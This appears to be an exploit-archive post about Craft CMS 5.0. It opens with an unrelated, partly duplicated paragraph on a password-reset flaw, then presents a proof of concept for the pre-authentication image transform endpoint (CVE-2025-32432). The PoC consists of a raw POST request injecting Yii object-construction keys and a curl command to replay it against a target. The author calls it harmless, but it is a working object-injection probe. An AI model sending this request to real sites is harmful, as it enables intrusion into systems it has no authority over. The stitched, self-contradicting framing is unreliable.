Craft CMS 5.0 Logic Flaw

Craft CMS 5.0 contained a logic flaw in its password Craft CMS 5.0 contained a logic flaw in its password reset mechanism.
The system would generate a valid password reset token even for disabled user accounts.
This meant an attacker could request a token for a disabled user.
The core issue was that the token was generated *before* verifying the account's enabled status.
An attacker could then use this token to change the disabled account's password.
This vulnerability could lead to account takeover or denial of service for legitimate users.
The fix involved ensuring the account is active *before* any password reset token is issued.

=============================================================================================================================================
| # Title : Craft CMS 5.0 Image Transform Authentication Logic Flaw |
| # Author : indoushka |
| # Tested on : windows 11 Fr(Pro) / browser : Mozilla firefox 145.0.1 (64 bits) |
| # Vendor : https://craftcms.com |
=============================================================================================================================================

POC :

[+] Description

A flaw in the Craft CMS image transform endpoint allows an unauthenticated attacker
to trigger backend processing without prior authentication.
While the original Metasploit module targeted RCE, (https://packetstorm.news/files/id/190728/ CVE-2025-32432)


This PoC does *not* execute code, does *not* write files, and does *not* inject
payloads. It only proves that the endpoint performs internal logic operations
without authentication.

# Vulnerability Class
Authentication Bypass ? Pre?Auth Backend Processing

# Impact
An attacker can:
- Trigger image transformation logic without logging in.
- Interact with backend components not intended for anonymous users.
- Validate the presence of the vulnerability safely without RCE.

=====================================================================
POC :
=====================================================================

Request :
---------
POST /index.php?p=actions/assets/generate-transform HTTP/1.1
Host: TARGET
Content-Type: application/json

{
"assetId": 1,
"handle": {
"width": 100,
"height": 100,
"as test": {
"class": "craft\\\\behaviors\\\\FieldLayoutBehavior",
"__class": "yii\\\\rbac\\\\PhpManager",
"__construct()": [
{ "itemFile": "/dev/null" }
]
}
}
}

Effect :
--------
- The server processes the transform request.
- The endpoint responds with a JSON transformation result.
- This demonstrates the pre-auth processing weakness.
- No execution, no payload, no harmful operations.

=====================================================================
How to Save & Use the PoC :
=====================================================================

1. Save the request into a file named:
craftcms_pre_auth_poc.txt

2. Use curl to replay the PoC (legal environments only):
curl -X POST \
-H "Content-Type: application/json" \
-d @craftcms_pre_auth_poc.txt \
https://TARGET/index.php?p=actions/assets/generate-transform

3. Expected safe behavior:
The server processes the request and responds with JSON even though
the attacker is not authenticated.

4. Tools that can import the PoC:
- Burp Suite Repeater
- OWASP ZAP
- Postman Raw HTTP

=====================================================================
# Recommendation
- Require authentication on all asset transformation endpoints.
- Validate input types before passing them to backend behavior handlers.
- Apply the vendor patch immediately once available.

=====================================================================
# Disclosure Timeline
- Original discovery: Orange Cyberdefense CSIRT
- Educational safe PoC adaptation: indoushka
- Status: Safe demonstration (no execution)
=====================================================================
Greetings to :=====================================================================================
jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
===================================================================================================